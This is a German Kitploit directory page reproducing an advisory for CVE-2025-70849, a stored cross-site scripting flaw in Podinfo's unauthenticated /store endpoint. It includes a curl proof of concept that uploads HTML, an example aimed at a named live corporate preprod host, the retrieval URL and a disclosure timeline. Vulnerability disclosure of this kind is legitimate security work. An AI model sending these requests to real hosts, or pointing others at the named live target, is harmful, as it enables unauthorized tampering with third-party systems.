Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/deaprojects/cve-2025-70849
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubdeaprojects/cve-2025-70849

CVE-2025-70849

CVE-2025-70849: Gespeichertes XSS in Podinfo

Repository anzeigen
11vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-70849: Gespeichertes XSS in Podinfo

Zusammenfassung

Eine Sicherheitslücke (CWE-79) wurde in Podinfo, einer Webanwendung zur Demonstration von Kubernetes-Mikrodiensten, identifiziert. Die /store-Funktion ermöglicht es nicht authentifizierten Benutzern, beliebige HTML/JS-Inhalte hochzuladen, was zu gespeichertem XSS führt.

Details zur Schwachstelle

  • CVE-ID: CVE-2025-70849
  • Produkt: Podinfo
  • Betroffener Endpunkt: /store
  • Schwachstellentyp: Gespeichertes Cross-Site Scripting (XSS)
  • Betroffene Versionen: <= 6.10.0

Beweis des Konzepts (PoC)

  1. Senden Sie die bösartige Nutzlast:
    root@kitploit:~
    curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
    Beispiel mit Live-Ziel:
Tool herunterladen
root@kitploit:~
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
Bild
  1. Rufen Sie den zurückgegebenen Hash ab: https:///store/

    Beispiel: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

    Bild

Zeitplan

  • Entdeckung: Sep 2025
  • Anbieter benachrichtigt: 25 OKT 2025
  • Antwort des Anbieters: Bestätigt; derzeit kein Zeitplan für einen Fix angegeben.
  • Öffentliche Offenlegung: Februar 2026

Haftungsausschluss Diese Forschung dient ausschließlich Bildungszwecken.

DANKE AN :

Kazi Sabbir |

Schweregrad: Mittel 6.4